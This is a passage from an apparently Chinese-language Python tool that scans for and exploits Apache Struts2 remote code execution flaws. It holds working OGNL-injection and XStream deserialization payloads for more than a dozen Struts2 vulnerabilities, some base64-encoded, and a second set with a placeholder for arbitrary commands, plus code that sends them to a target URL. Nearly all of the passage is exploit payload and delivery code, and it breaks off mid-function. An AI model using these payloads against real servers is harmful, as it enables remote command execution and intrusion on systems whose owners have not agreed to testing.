                "ST2-005":base64.b64decode("KCdcNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJykoYSk9dHJ1ZSYoYikoKCdcNDNjb250ZXh0W1wneHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvblwnXVw3NWZhbHNlJykoYikpJignXDQzYycpKCgnXDQzX21lbWJlckFjY2Vzcy5leGNsdWRlUHJvcGVydGllc1w3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJykoYykpJihnKSgoJ1w0M215Y21kXDc1XCduZXRzdGF0IC1hblwnJykoZCkpJihoKSgoJ1w0M215cmV0XDc1QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKFw0M215Y21kKScpKGQpKSYoaSkoKCdcNDNteWRhdFw3NW5ld1w0MGphdmEuaW8uRGF0YUlucHV0U3RyZWFtKFw0M215cmV0LmdldElucHV0U3RyZWFtKCkpJykoZCkpJihqKSgoJ1w0M215cmVzXDc1bmV3XDQwYnl0ZVs1MTAyMF0nKShkKSkmKGspKCgnXDQzbXlkYXQucmVhZEZ1bGx5KFw0M215cmVzKScpKGQpKSYobCkoKCdcNDNteXN0clw3NW5ld1w0MGphdmEubGFuZy5TdHJpbmcoXDQzbXlyZXMpJykoZCkpJihtKSgoJ1w0M215b3V0XDc1QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpJykoZCkpJihuKSgoJ1w0M215b3V0LmdldFdyaXRlcigpLnByaW50bG4oXDQzbXlzdHIpJykoZCkp"),
                "ST2-009":'''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]''',
                "ST2-013":base64.b64decode("YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCduZXRzdGF0IC1hbicpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0="),
                "ST2-016":base64.b64decode("cmVkaXJlY3Q6JHslMjNyZXElM2QlMjNjb250ZXh0LmdldCglMjdjbyUyNyUyYiUyN20ub3BlbiUyNyUyYiUyN3N5bXBob255Lnh3byUyNyUyYiUyN3JrMi5kaXNwJTI3JTJiJTI3YXRjaGVyLkh0dHBTZXIlMjclMmIlMjd2bGV0UmVxJTI3JTJiJTI3dWVzdCUyNyksJTIzcyUzZG5ldyUyMGphdmEudXRpbC5TY2FubmVyKChuZXclMjBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJTI3bmV0c3RhdCUyMC1hbiUyNy50b1N0cmluZygpLnNwbGl0KCUyN1xccyUyNykpKS5zdGFydCgpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlciglMjdcXEElMjcpLCUyM3N0ciUzZCUyM3MuaGFzTmV4dCgpPyUyM3MubmV4dCgpOiUyNyUyNywlMjNyZXNwJTNkJTIzY29udGV4dC5nZXQoJTI3Y28lMjclMmIlMjdtLm9wZW4lMjclMmIlMjdzeW1waG9ueS54d28lMjclMmIlMjdyazIuZGlzcCUyNyUyYiUyN2F0Y2hlci5IdHRwU2VyJTI3JTJiJTI3dmxldFJlcyUyNyUyYiUyN3BvbnNlJTI3KSwlMjNyZXNwLnNldENoYXJhY3RlckVuY29kaW5nKCUyN1VURi04JTI3KSwlMjNyZXNwLmdldFdyaXRlcigpLnByaW50bG4oJTIzc3RyKSwlMjNyZXNwLmdldFdyaXRlcigpLmZsdXNoKCksJTIzcmVzcC5nZXRXcml0ZXIoKS5jbG9zZSgpfQ=="),
                "ST2-019":base64.b64decode("ZGVidWc9Y29tbWFuZCZleHByZXNzaW9uPSNmPSNfbWVtYmVyQWNjZXNzLmdldENsYXNzKCkuZ2V0RGVjbGFyZWRGaWVsZCgnYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MnKSwjZi5zZXRBY2Nlc3NpYmxlKHRydWUpLCNmLnNldCgjX21lbWJlckFjY2Vzcyx0cnVlKSwjcmVxPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCgpLCNyZXNwPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UoKS5nZXRXcml0ZXIoKSwjYT0obmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihuZXcgamF2YS5sYW5nLlN0cmluZ1tdeyduZXRzdGF0JywnLWFuJ30pKS5zdGFydCgpLCNiPSNhLmdldElucHV0U3RyZWFtKCksI2M9bmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIoI2IpLCNkPW5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCNjKSwjZT1uZXcgY2hhclsxMDAwMF0sI2QucmVhZCgjZSksI3Jlc3AucHJpbnRsbigjZSksI3Jlc3AuY2xvc2UoKQ=="),
                "ST2-devmode":'''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an''',
                "ST2-032":'''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat -an&pp=____A&ppp=%20&encoding=UTF-8''',
                "ST2-033":'''/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=netstat -an''',
                "ST2-037":'''/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=netstat -an''',
                "ST2-048":'''name=%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''',
                "ST2-052":'''<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>whoami</string></command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> ''',
                "ST2-053":'''%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27netstat%20-an%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D''',
                }
        self.shell = {
                "struts2-005":base64.b64decode("KCdcNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJykoYSk9dHJ1ZSYoYikoKCdcNDNjb250ZXh0W1wneHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvblwnXVw3NWZhbHNlJykoYikpJignXDQzYycpKCgnXDQzX21lbWJlckFjY2Vzcy5leGNsdWRlUHJvcGVydGllc1w3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJykoYykpJihnKSgoJ1w0M215Y21kXDc1XCdGVVpaSU5HQ09NTUFORFwnJykoZCkpJihoKSgoJ1w0M215cmV0XDc1QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKFw0M215Y21kKScpKGQpKSYoaSkoKCdcNDNteWRhdFw3NW5ld1w0MGphdmEuaW8uRGF0YUlucHV0U3RyZWFtKFw0M215cmV0LmdldElucHV0U3RyZWFtKCkpJykoZCkpJihqKSgoJ1w0M215cmVzXDc1bmV3XDQwYnl0ZVs1MTAyMF0nKShkKSkmKGspKCgnXDQzbXlkYXQucmVhZEZ1bGx5KFw0M215cmVzKScpKGQpKSYobCkoKCdcNDNteXN0clw3NW5ld1w0MGphdmEubGFuZy5TdHJpbmcoXDQzbXlyZXMpJykoZCkpJihtKSgoJ1w0M215b3V0XDc1QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpJykoZCkpJihuKSgoJ1w0M215b3V0LmdldFdyaXRlcigpLnByaW50bG4oXDQzbXlzdHIpJykoZCkp"),
                "struts2-009":'''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27FUZZINGCOMMAND%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]''',
                "struts2-013":base64.b64decode("YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCdGVVpaSU5HQ09NTUFORCcpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0="),
                "struts2-016":base64.b64decode("cmVkaXJlY3Q6JHslMjNyZXElM2QlMjNjb250ZXh0LmdldCglMjdjbyUyNyUyYiUyN20ub3BlbiUyNyUyYiUyN3N5bXBob255Lnh3byUyNyUyYiUyN3JrMi5kaXNwJTI3JTJiJTI3YXRjaGVyLkh0dHBTZXIlMjclMmIlMjd2bGV0UmVxJTI3JTJiJTI3dWVzdCUyNyksJTIzcyUzZG5ldyUyMGphdmEudXRpbC5TY2FubmVyKChuZXclMjBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJTI3RlVaWklOR0NPTU1BTkQlMjcudG9TdHJpbmcoKS5zcGxpdCglMjdcXHMlMjcpKSkuc3RhcnQoKS5nZXRJbnB1dFN0cmVhbSgpKS51c2VEZWxpbWl0ZXIoJTI3XFxBJTI3KSwlMjNzdHIlM2QlMjNzLmhhc05leHQoKT8lMjNzLm5leHQoKTolMjclMjcsJTIzcmVzcCUzZCUyM2NvbnRleHQuZ2V0KCUyN2NvJTI3JTJiJTI3bS5vcGVuJTI3JTJiJTI3c3ltcGhvbnkueHdvJTI3JTJiJTI3cmsyLmRpc3AlMjclMmIlMjdhdGNoZXIuSHR0cFNlciUyNyUyYiUyN3ZsZXRSZXMlMjclMmIlMjdwb25zZSUyNyksJTIzcmVzcC5zZXRDaGFyYWN0ZXJFbmNvZGluZyglMjdVVEYtOCUyNyksJTIzcmVzcC5nZXRXcml0ZXIoKS5wcmludGxuKCUyM3N0ciksJTIzcmVzcC5nZXRXcml0ZXIoKS5mbHVzaCgpLCUyM3Jlc3AuZ2V0V3JpdGVyKCkuY2xvc2UoKX0="),
                "struts2-019":base64.b64decode("ZGVidWc9Y29tbWFuZCZleHByZXNzaW9uPSNmPSNfbWVtYmVyQWNjZXNzLmdldENsYXNzKCkuZ2V0RGVjbGFyZWRGaWVsZCgnYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MnKSwjZi5zZXRBY2Nlc3NpYmxlKHRydWUpLCNmLnNldCgjX21lbWJlckFjY2Vzcyx0cnVlKSwjcmVxPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCgpLCNyZXNwPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UoKS5nZXRXcml0ZXIoKSwjYT0obmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihuZXcgamF2YS5sYW5nLlN0cmluZ1tdeydGVVpaSU5HQ09NTUFORCd9KSkuc3RhcnQoKSwjYj0jYS5nZXRJbnB1dFN0cmVhbSgpLCNjPW5ldyBqYXZhLmlvLklucHV0U3RyZWFtUmVhZGVyKCNiKSwjZD1uZXcgamF2YS5pby5CdWZmZXJlZFJlYWRlcigjYyksI2U9bmV3IGNoYXJbMTAwMDBdLCNkLnJlYWQoI2UpLCNyZXNwLnByaW50bG4oI2UpLCNyZXNwLmNsb3NlKCk="),
                "struts2-devmode":'''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=FUZZINGCOMMAND''',
                "struts2-032":'''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=FUZZINGCOMMAND&pp=____A&ppp=%20&encoding=UTF-8''',
                "struts2-033":'''/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=FUZZINGCOMMAND''',
                "struts2-037":'''/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=FUZZINGCOMMAND''',
                "struts2-048":'''name=%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='FUZZINGCOMMAND').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''',
                "struts2-052":'''<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>FUZZINGCOMMAND</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> ''',
                "struts2-053":'''%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27echo%20%2281dc9bdb52d04dc2%22%26%26FUZZINGCOMMAND%26%26echo%20%220036dbd8313ed055%22%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D''',
                }
    def check(self, pocname, vulnstr):
        if vulnstr.find("Active Internet connections") is not -1:
            cprint("目标存在" + pocname + "漏洞..[Linux]", "red")
        elif vulnstr.find("Active Connections") is not -1:
            cprint("目标存在" + pocname + "漏洞..[Windows]", "red")
        elif vulnstr.find("活动连接") is not -1:
            cprint("目标存在" + pocname + "漏洞..[Windows]", "red")
        elif vulnstr.find("LISTEN") is not -1:
            cprint("目标存在" + pocname + "漏洞..[未知OS]", "red")
        else:
            cprint("目标不存在" + pocname +"漏洞..", "green")
    def scan(self):
        cprint('''Code by Lucifer.''', 'cyan')
        cprint("-------检测struts2漏洞--------\n目标url:"+self.url, "cyan")
        try:
            req = requests.post(self.url, headers=headers, data=self.poc['ST2-005'], timeout=6, verify=False)
            self.check("struts2-005", req.text)
        except Exception as e:
            cprint("检测struts2-005超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.post(self.url, headers=headers, data=self.poc['ST2-009'], timeout=6, verify=False)
            self.check("struts2-009", req.text)
        except Exception as e:
            cprint("检测struts2-009超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.post(self.url, headers=headers, data=self.poc['ST2-013'], timeout=6, verify=False)
            self.check("struts2-013", req.text)
        except Exception as e:
            cprint("检测struts2-013超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.post(self.url, headers=headers, data=self.poc['ST2-016'], timeout=6, verify=False)
            self.check("struts2-016", req.text)
        except Exception as e:
            cprint("检测struts2-016超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.post(self.url, headers=headers, data=self.poc['ST2-019'], timeout=6, verify=False)
            self.check("struts2-019", req.text)
        except Exception as e:
            cprint("检测struts2-019超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.get(self.url+self.poc['ST2-devmode'], headers=headers, timeout=6, verify=False)
            self.check("struts2-devmode", req.text)
        except Exception as e:
            cprint("检测struts2-devmode超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.get(self.url+self.poc['ST2-032'], headers=headers, timeout=6, verify=False)
            self.check("struts2-032", req.text)
        except Exception as e:
            cprint("检测struts2-032超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.get(self.url+self.poc['ST2-033'], headers=headers, timeout=6, verify=False)
            self.check("struts2-033", req.text)
        except Exception as e:
            cprint("检测struts2-033超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.get(self.url+self.poc['ST2-037'], headers=headers, timeout=6, verify=False)
            self.check("struts2-037", req.text)
        except Exception as e:
            cprint("检测struts2-037超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.get(self.url, headers=headers2, timeout=6, verify=False)
            self.check("struts2-045", req.text)
        except Exception as e:
            cprint("检测struts2-045超时..", "cyan")
            print("超时原因: ", e)
        try:
            uploadexp = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x000"
            files ={"test":(uploadexp, "text/plain")}
            req = requests.post(self.url, files=files, timeout=6, verify=False)
            self.check("struts2-046", req.text)
        except Exception as e:
            cprint("检测struts2-046超时..", "cyan")
            print("超时原因: ", e)
        try:
            vulnurl = urlparse(self.url)[0] + "://" + urlparse(self.url)[1] + "/struts2-showcase/integration/saveGangster.action"
            postdata = {
                "name":self.poc['ST2-048'],
                "age":"1",
                "__checkbox_bustedBefore":"true",
                "description":"1",
            }
            req = requests.post(vulnurl, data=postdata, headers=headers, timeout=6, verify=False)
            self.check("struts2-048", req.text)
        except Exception as e:
            cprint("检测struts2-048超时..", "cyan")
            print("超时原因: ", e)
        try:
            req1 = requests.get(self.url+"?class[%27classLoader%27][%27jarPath%27]=1", headers=headers, timeout=6, verify=False)
            req2 = requests.get(self.url+"?class[%27classLoader%27][%27resources%27]=1", headers=headers, timeout=6, verify=False)
            if req1.status_code == 200 and req2.status_code == 404:
                cprint("目标存在struts2-020漏洞..(只提供检测)", "red")
            else:
                cprint("目标不存在struts2-020漏洞..", "green")
        except Exception as e:
            cprint("检测struts2-020超时..", "cyan")
            print("超时原因: ", e)
        try:
            req = requests.post(self.url, data=self.poc['ST2-052'], headers=headers_052, timeout=6, verify=False)
            if req.status_code == 500 and r"java.security.Provider$Service" in req.text:
                cprint("目标存在struts2-052漏洞..(参考metasploit中的struts2_rest_xstream模块)", "red")
            else:
                cprint("目标不存在struts2-052漏洞..", "green")
        except Exception as e:
            cprint("检测struts2-052超时..", "cyan")
            print("超时原因: ", e)
        try:
            param=""
            vulnurl = self.url + "?" + param + "=" + self.poc['ST2-053']
            req = requests.get(vulnurl, headers=headers, timeout=6, verify=False)
            self.check("struts2-053", req.text)
        except Exception as e:
            cprint("检测struts2-053超时..", "cyan")
            print("超时原因: ", e)
        try:
